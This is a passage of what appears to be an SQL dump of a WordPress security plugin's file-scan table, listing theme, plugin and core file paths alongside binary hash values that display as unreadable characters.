','rc��ݽ����\Z}�I�������r���','',0,'?'),('Ms�5��{�1K�\r�','wp-content/themes/graphene/images/social/steam.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+��1�c�5*�f��U','��J\"�+yIG���e|�p��u\r��u','',0,'?'),('M|o;$d�Mr�#�','wp-content/themes/weblog/assets/js/weblog-custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���gv�w�[f�	Ŝ�','Q�?�����퐲�a�������]H��\\n\nI','',0,'?'),('M��3룶��qu��0~�','wp-content/themes/graphene/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q׎�JmĹRn��5��','z7�\'ox��닎�%3�Z�>E\\��>,��','',0,'?'),('M���e\nt�M�B�`5','wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-l10n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d}\0(�	��l�','k,;u0����q��r�L��\r�N�-�i�8W','',0,'?'),('M�[\Z�2hT�	�K�','wp-content/plugins/wp-cerber/assets/flags/tr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<~Qk�dIr&��-!','�\"��i0�M��˩��VJc���]�3�\n��[','',0,'?'),('M�;\"���lؑ&���Wv','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/hint/show-hint.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1���q���zAHL3','�1��+kI_Ԁޘ���#O�C6�\n�c��','',0,'?'),('M�ˆE��6Y|�a','wp-content/themes/hitmag/inc/kirki/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-#\";��\'o{���K','W��y� R��#i��b�N����KH�n0��','',0,'?'),('Mǒ�tBz$aJ����','wp-content/themes/event/js/source/color-scheme-control.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TUDB%gAXi�ݸ�x�','#F۸�:}ݼ�b�;5��2�%O�ʎ�*','',0,'?'),('M�DW�_n	k�x��o','wp-content/themes/enigma/images/BeautySpa.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�VW����|�(�\\�','��#1�}Y\\�=(��^a�\n&ɏ?r�M�O�o','',0,'?'),('MР\0�A���9Q�+��','wp-includes/js/admin-bar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�၈��n�&�a1a\0','(L��<����K�i�-��U4�Wܸ` ��rl$�','',0,'?'),('M�o���S��y�;[��l','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/selection/mark-selection.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�DA��Bd���}}','N�HӅ��RŸ���iVS�ә60�_?;�)�','',0,'?'),('M�#;6�e���lq	�','wp-content/themes/chronus/assets/js/svgxuse.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�0�+��ӏ�i�o�','ڮ�Q����_m�y5�l�m+3��R>J���','',0,'?'),('M�A�m3���#Z��t','wp-content/themes/quicksand/js/bootstrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{#Fl�~�J̤j�4','���t]d`��O�-ψ�L񚭻e��|r�0�;','',0,'?'),('M�;C�����8Yyﲏ','wp-includes/js/twemoji.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���װ�aL/S��T','e�dimԺm\Z$V��v�%	���FO��aK\rŇS','',0,'?'),('M��w�M�f�0�b\\�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�+>����*�A��ř�','����{��Z�>�1k||�}P���C�TC��A','',0,'?'),('M���I�M��rD��-','wp-includes/post-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a^E�@�p�\'��?�','N�O�[wȐ��	��&Ќ�!P��Qe��s','',0,'?'),('N7�A�\0�nnV�֑�','wp-content/plugins/wordfence/images/checkbox.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��G\r�6|􈘀\'','��y~`w(j�~�=뤼&��ݴ���Q>`^�x','',0,'?'),('N9Fm���9t/�+y���','wp-content/themes/event/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��@2���������','F?x瞽�nv��\r��9�ad��R��!{�\"Hy','',0,'?'),('N=�f�>$K���H�T�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����?�G{�����g','ĀР<W�;-\Z񀍙��(C+�,M���U��W6','',0,'?'),('Na�r�d/�6Qx�Қ','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-radio-buttonset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xIu�3�x���L�Q','(%��O �CW��I�VXV����29�_��\\�','',0,'?'),('Nh�������\n�%','wp-content/themes/weblog/acmethemes/customizer/sanitize-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�t�T����h\"��','J�4��,Ģ��_��u�\'��K���Qʷ��,','',0,'?'),('Ni�~	�`���W�E','wp-content/plugins/wordfence/lib/wfAlerts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�(A��|�ϯy��L','�\'_�;?�|US5d}K/+,I!|��t','',0,'?'),('Nxa�߭�̿��(r�_','wp-content/plugins/all-in-one-wp-security-and-firewall/backups/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('N|�‡Jв�zn�sw','wp-includes/pluggable-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���\"�j��2�ߖ','��U����=����co��=t1�-\\�\r�=','',0,'?'),('N���W[��@��t)�','wp-content/plugins/wordfence/css/iptraf.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�bf.��\n�V[�xPh','J��-@ ]�-��	�cq���WQ$8�','',0,'?'),('N�3�j@pu5����^��','wp-includes/js/tinymce/skins/wordpress/images/more.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n�\nm\0;�˫�z','$��v��o^���U� �A\0���:�\\C�u��','',0,'?'),('N��у�Ɉ�����&s','wp-content/themes/skt-pathway/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=V�|fU�Z����','��:Z^�d�?S���:�L[����i�/A���','',0,'?'),('N�Z<9��M��','wp-content/themes/event/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?��U��<�O�zsI','W8���/\ned�s��׆(]U��w�rź!','',0,'?'),('N�O���+��9+eA�','wp-content/themes/quicksand/inc/class.QuicksandCustomizeCategoryControl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�樿Z\rz���X�','(�I��@����Ns�\r��A�<-8Z�Vnv�','',0,'?'),('N�FhPE�|���','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/javascript/json-ld.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ԕ��_,�J`*\rO��y','p	8M��0���?H�fM�����\0}v�K����','',0,'?'),('N��HV����}�4G','wp-admin/css/customize-widgets-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�\"?.�i�!�qe�o�','ߟ�d��~o�K�C��ѰE��˛)5��.9�A','',0,'?'),('N�>Hy�o��l��͆','wp-content/themes/graduate/tp-education/tp-archive-class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԃt�7<֚�-�','V�܇�DzK1Ȼ�?�=�\"s�NbL`0�g��','',0,'?'),('N��lI���V�,�Z�','wp-content/plugins/wp-cerber/assets/flags/hn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����;Ҿ����:��','e��{9�[�۫�p��Nk83)t����$<5�','',0,'?'),('N�p������M�7�','wp-content/themes/graduate/assets/plugins/css/unminified/jquery.sidr.light.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�¨j�=�1��9 ',')�e�:��\rT��Gg���l/.~�~>e=$���','',0,'?'),('N��a��⿙e]�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3de{�h��|@��ձ','��BX����V�AӋ6�4���/Mk��f�','',0,'?'),('N�ܖ��(*��[M�-�','wp-content/themes/enigma/more.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*����\"���Sx��^','�}>NW��\"`���c1+�[9]���T�O','',0,'?'),('O	��S����#�Yi�v','wp-admin/includes/class-wp-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!T<zs�6�C�?r\r�','�hŽ�[��в�u�\0Jh=�$�6L)c^f��zb��','',0,'?'),('Oj�a��N	\rR�','wp-content/themes/hemingway/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�,���=NS�!2p*<�','TJXF��4\r�ʽ���Y\"���J[�h�','',0,'?'),('O�ҽPT�^�4~��B','wp-includes/css/dist/editor/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k����`�\0d���‘','�2��*Pj%R4{?��M�rH�:�����b�~','',0,'?'),('O�3H��}���','wp-content/themes/graduate/inc/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nU}YL��3��Tt��','Ms]�,o�܅��$}AI��<hz}�\rr�p�','',0,'?'),('O =(�:��<�	�1F�','wp-includes/class-wp-feed-cache-transient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x��?^>��O�',':��;h�!xE�z��P+�dV�0����D�','',0,'?'),('O(�\Zm���6y%9��','wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-sortable-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�*�\0tY�M[���','�$M��H}f(<�\"@����=$��gIw�� Ԫ','',0,'?'),('O+���[�IB���m�m\'','wp-content/plugins/wordfence/images/wf-central-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�(��VѤ���','\0{\r�ߘ�J/� �^�+��,��S������','',0,'?'),('O.�5�����k�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/mode/simple.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�uT��i)�\n�4V�','k�d��E���M��(S$�Lh搖#L{.#c?�','',0,'?'),('O4�dzWQ�\0��R��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Lj���\"C�ix���','��x眪!����}�\Z�����W����d','',0,'?'),('O4��w��!�������g','wp-content/themes/hitmag/js/html5shiv.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�D\r)��7c���O','�(��B5s�TP���<pt%�FI4�L�RZ_��Y','',0,'?'),('O=��h�\0}O��rL�b','wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�U��~�L5�@\ZVU','/�r��T�rm����G�с�\r�%�e\r��|�[','',0,'?'),('OJ�?�Cz�V�^2���1','wp-content/plugins/wp-cerber/assets/flags/mr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n��Y��kF���@','���c���n�foaYd��M@�0O��DI\n��x','',0,'?'),('OS�Y�Wz!8�ʣj�','wp-content/plugins/wordfence/views/gdpr/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\atn}#��\r��׈','ÝE��F�@kh��V�b��w6��~�#kC','',0,'?'),('OT���;�h�FR|�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-maintenance-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;I�U`��t���',';�9�sM�lȴ[\ZZY��B�����{��Re','',0,'?'),('O^6�l\nf������˹','wp-content/themes/newsmag/inc/sidebars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ƬV�k�#�e�3~','��~�T�U�ry�n���p�g�!��Dc_=v�','',0,'?'),('OlqCcێ���������','wp-admin/css/forms-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�`�����kث=','g��<�������ƃ˂�s��{5Ϝq��6�','',0,'?'),('Oy�}Ma���_��I','wp-includes/Requests/Exception/HTTP/504.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�̪Db� ��*�','�<����!B�|$k���݈�# �e�i%0','',0,'?'),('OzJ���y����lD�q','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-radio-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��eEo�������3','\0Q�}����m�P��{���#�D�R���','',0,'?'),('O�潼m$��݋&_','wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�F��\n�D��ҭ�','2\"�ޡ�4e���Kӗ�p!w#�����1���,','',0,'?'),('O��\\���P5��{�R�','wp-admin/plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9=�C���;��w^�X','�_\n�W����o�0w�����7��`=�r��','',0,'?'),('O�[0{�ë ��/�¼','wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')e��f�#�`P�~7�n','-m��z��n�N�F�E\0ѭ\\vq�sL?�Z\Z��','',0,'?'),('O�c��Hߝ��z�x�','wp-content/themes/Endolf/aq_resizer.php',0,'H�{��x3��0k�\Z','H�{��x3��0k�\Z','�^��!��`\\���#���+��������u�','',0,'?'),('O����&�r�蓏�� ','wp-admin/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.\"�\Z���&T;�ݫ��','c�tg�H���u����L=?q�u���EA','',0,'?'),('O����R�r����D�?�','wp-admin/js/postbox.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b���J��z%p','�qG%`�3E�:j~^�\ZҌ��;,��','',0,'?'),('O����<�R>\"��x','wp-content/themes/graphene/admin/images/ico-info.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�HX�LmB��#\'�\"�','�xY�ENm~D�����\r�k���[�L~x','',0,'?'),('O�+�`�S	.Fw��_','wp-content/themes/city-store/assets/js/city-store-slider-setting.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x��.l�ے\"CϚ�','��=e\r�91;hW�g��N�6;��w��','',0,'?'),('O�籠�F�5z�m��','wp-content/themes/graphene/includes/theme-webfonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y���\'�u�/�m��&','z�w�.Y}�VܢFE��Ua�8vݢ� �蘑','',0,'?'),('O�f4Φ��t���R','wp-content/themes/graduate/tp-education/tp-archive-team.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�1������@�R','��#�K�\0����\n�ʒ1r{��˽�B05','',0,'?'),('O�;*o�QQsDf.��-','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w����If8� �1�','�Z�\\U��`��c5��L\r[�s�y���}}','',0,'?'),('O�{w1�����q�IJ�','wp-content/themes/enigma/images/portfolio1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C8���`.�O��и','SB(��z�(�^(��0���2��x�6\r�i�','',0,'?'),('O����y ��k	b�','wp-admin/css/customize-nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lU�e�H�Y%U�n��','AK希T�YL�6��~8����w,9�ˉ+�R�f','',0,'?'),('O�����HI!K!0[�','wp-content/plugins/wordfence/lib/menu_scanner_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�����D�X�;�I','���C�&YB�p_d$�,+������Ŝ���J��','',0,'?'),('O�G��Z��E�6y{!|','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/comment/continuecomment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�Rՠ�}�C���W%','�h�aZM��r��/ˈ�r=�`��4��B�@','',0,'?'),('O�vÅQ?�20�@,','wp-content/themes/graphene/admin/options-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.�{��҇I�Gm','�<�����M�(j�\n��р�(%Jt�r��P','',0,'?'),('O�5e���;hz�w@�W','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z<����{~G�f(','��,ב[\Z���@�+���?x���P��А�','',0,'?'),('Oﶆc`�k2�0�\'�m','wp-content/themes/wp-simple/inc/kirki/kirki/kirki.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'_(Z���Š�','�-���Dn`B��\n��{`FD��׹f�37:4Bj��','',0,'?'),('O��O�M_K7�n��','wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*5���^gG�o<NN','5�\'4ϣ�j3Ò�NjX�CU�!�����]~','',0,'?'),('O�Z_,9\0�;�����','wp-content/themes/graphene/images/social/evernote.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Жq�ؖ�f=xqS�$','b�����*Px�Z�K<[�����ߑ5���','',0,'?'),('O�B��ZF��n��a_�','wp-content/themes/graphene/admin/faq.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a�\0o1��\"�3?�','8g�hԥ�N$��2�Ұ����\"C.���p�\0�2','',0,'?'),('O�hu�G���&\0�L�','wp-includes/Text/Diff/Engine/native.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S���\r��$�T','S��\04�v@�ű`�DG V�u�e�R��B竇3�','',0,'?'),('P��H��Z`�=���','wp-includes/blocks/pullquote/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�1��ݗz��sK�c','v�K�N��`\ZX�n$`7P��Y6�~ON�1�','',0,'?'),('P�bw�=����i��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\\Z��Iw5AlLۢ�','��K{�8��fl��7s�Rh���嗋��I','',0,'?'),('P�/:��̮�҉���H','wp-content/plugins/wordfence/waf/pomo/streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�З:4�z��M�E�7�','�!8�s���w�#�)��\r�<�r|2y*LS^','',0,'?'),('P�GC(Rk�a\"��7','wp-content/themes/gildrest/img/no-image.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�∙�݆<q�C>','P6��yh���}m��^�~8���&Wm���b','',0,'?'),('P\Z�o�ڱӿ�!8H1�','wp-content/themes/catch-flames/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I �:s�����֐�{�','��i2��W3��ե�����%��$�ރk�','',0,'?'),('PE۫�7r|oI�6��>','wp-includes/js/backbone.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`ft7\\J�*��4a','j�˯�}j�$��@�č��� n%Q|�l��','',0,'?'),('P ���NtD�݌�n\"�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��!�,��^�q�','X߇p�Ք�Z��Љ�ֱo�\r�=˸<!�~�3�','',0,'?'),('P&_#�\'�zT���s','wp-includes/Requests/Exception/HTTP/417.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bpj�hO^�c\\G #','���L�T��Ҙ$xDs�^�h_!kC�\"1\'��_�','',0,'?'),('P\'�(���?+�z��$�','wp-admin/js/postbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"$;�9H�S_��7���','��`���R���f!Rd�<����Q�� ��GIJ','',0,'?'),('P2��aT\rs��*���','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/lint/json-lint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��ѧ���!U<(��','����m\"7х�uq����/��~�������','',0,'?'),('P73o�	��\0�=��','wp-admin/js/word-count.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\rffB)��������','��6j�,A�ުǭs�D��eC�z�&���\n���','',0,'?'),('PHeb!��� �<','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/bin/release',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	\rY_-J�3�q�','k�%�Ҁ�w_3�P�S�٩��5�ڂ\r�G�۞','',0,'?'),('PJ�~]��; ��`y','wp-includes/widgets/class-wp-widget-media-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dCa�*C^e~OriA�','�L�/�T|����w�pEf1�Ln��!y���','',0,'?'),('PK��2�I��)��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3[�h�k�da4�p','�&�!�7^�@��9���N�BT�����*8�','',0,'?'),('PT �\"�����b/;','wp-content/themes/enigma/core/admin/bootstrap/js/bootstrap.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ŵ���f�#!��N1','僉k�Y�(�O(��N\'=X֘�B��x5�','',0,'?'),('Pfw|�u$��5�e','wp-content/themes/singularity/inc/functions-edd.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�Jm���Oow�A�j/','&\r��21a���Fd\0�[�X�\0���F��\ZGn�','',0,'?'),('Pp�,���*M���z','wp-content/themes/wp-simple/inc/kirki/includes/panels/class-kirki-panels-default-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �x딱]�S�jp�','�o�xSY���sg�`Ȅ� \"��r6Z��V, C�','',0,'?'),('Psl��C�b�W��5>','wp-content/themes/chronus/assets/css/customizer-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�h0G0����  ��','�4\'FhI@K��<����`��c�\n�S��A�&','',0,'?'),('Pu����J#��1AI9�','wp-content/themes/graphene/images/social/twitter.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��A��ec/�)���','�l����z��Sf�iԑڃ�фiD�>T��','',0,'?'),('Py/bj[�4��V���e','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-number.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7�*@#gd}�?�b','�c�j�.\n�g�~�G���ŏDz�`n�=','',0,'?'),('Pzy���$!\'�,ܠ�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/css/customizer-dynamic-css-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�o�\nW�8��BC��','��}��ڝ���$X����Y�\0%tJ�\'���','',0,'?'),('P��[�D�XP��a���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;u‰�S���l','�M>:\r�&�V��`�\Z:�O0�Sv;\0��V�w','',0,'?'),('P��iz�t�a�}�a','wp-admin/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z\\���@�ju��W�=','�%Z��j��\Za��� ��Dy��b����','',0,'?'),('P��u��[߯��:\Z]3','wp-content/themes/hitmag/inc/kirki/assets/scss/controls/repeater.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�P�a��#,?�','As�r8;���sMk�0=]�q!�a�;�:��\'','',0,'?'),('P����5>.\0iM픖�a','wp-content/themes/chronus/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rY��F�@Q�>��','�]��gO�OZ�_��vj벀\"�䮬��+','',0,'?'),('P��\n�e���u�\"�','wp-includes/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AG�\Zˢ;�������l','�D^�Y���\n�����%P+�0��[�x�~��','',0,'?'),('P����w�~��K�E','wp-content/themes/simpleshift/inc/kirki/assets/images/kirki-bottom.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����v�}��^��','�%\Z�\"S��/k��������������Q�','',0,'?'),('P��y����Xn��','wp-content/plugins/wp-cerber/assets/flags/an.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B����\ZEs�F\r�8','���Z��iLz�q`�{ۯۇn	�fN�zY3i�','',0,'?'),('P�a�l&��:�)V�I�','wp-content/plugins/wp-cerber/assets/flags/ax.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l���ho��%>��T�','Ku*Q(�g�iC�`i0�����ȇ�R.�c���','',0,'?'),('P�@���;b<\n�c�','wp-includes/class-wp-oembed-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\";�r��\Z(FAU','�p���[����j$8�7�zI\\�!y�<G�4\r���','',0,'?'),('P�M�\Z�I̸�ݭY`r','wp-content/plugins/wordfence/lib/wfHelperString.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Euƻ\\S w?,�_�L`','��� ��i�Lƛw���6�_���,n�2S��Zh)','',0,'?'),('P�$�,v|���� ��','wp-content/themes/education-hub/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�\':k�*�C�!/��','o[�U5��2ƀ��\r�vd\\�C��A�@\\��','',0,'?'),('P�1$���\\*�C','wp-admin/images/stars-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A���#�S�Me.^','[��耿�_(\rh���Y���T��qZ��','',0,'?'),('P�\"��E�\\V2UV*+','wp-content/themes/catch-responsive/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�i��p�Ec�p�\\��','$��W\n�Z1�h���;r���s���^S�','',0,'?'),('P��0��a��R�z= ','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�gkeͿݾ���|�h','�H��zj鞨%�����p=�Z��iNA�Z�','',0,'?'),('P�-���6��@�p~�','wp-content/themes/auberge/template-parts/content-post-condensed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���yY��~��vVY\'\\','\\��]�hX�´��[b��O�nf��]J�','',0,'?'),('Q�*vAf�>����','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/fold/foldgutter.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�����}�8�','�h�7��*GN0��T�0�N7��ŰCQtPJ','',0,'?'),('Q\r�1J&\"Q������:','wp-content/themes/advance/js/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�9z�dM@�\rj','��;~����E�#G�E�U���;tE�,����̹','',0,'?'),('Qr:�\0��`GCx�7y','wp-content/themes/wp-simple/assets/images/bullets.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P��3�����\'','5 �Wl�	���7`��Z��gA�g�A���#g\Z','',0,'?'),('Q㯦�\"��g��w�f�','wp-content/themes/hitmag/inc/widgets/popular-tags-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Yc����d��wo^�V','���F���B{�EάA�B�\'m�:�p-M59e','',0,'?'),('Q$���*���x%��T','wp-content/themes/saybusiness/template-parts/page-with-both-sidebars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m������{�>z�','��&��KE�\'ܚ�*t�Gi\"��.','',0,'?'),('Q;���(����Mp*�','wp-admin/js/widgets/media-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PQ�{���97@�]տ','PP&`@�U��}�{�������_V��,HCV','',0,'?'),('QJ���s3�R�aU*�s','wp-content/themes/twentynineteen/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���հ&��Tgs\r','0�ed ��s��X������Q8���3�Z��','',0,'?'),('QN�ٸ��\Z��9e�ԯ','wp-content/themes/hitmag/inc/kirki/includes/class-kirki-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R��o��=�n�&H�\"','���~�A��d�%����ku�be�R_�O�T','',0,'?'),('QSi��=�r�	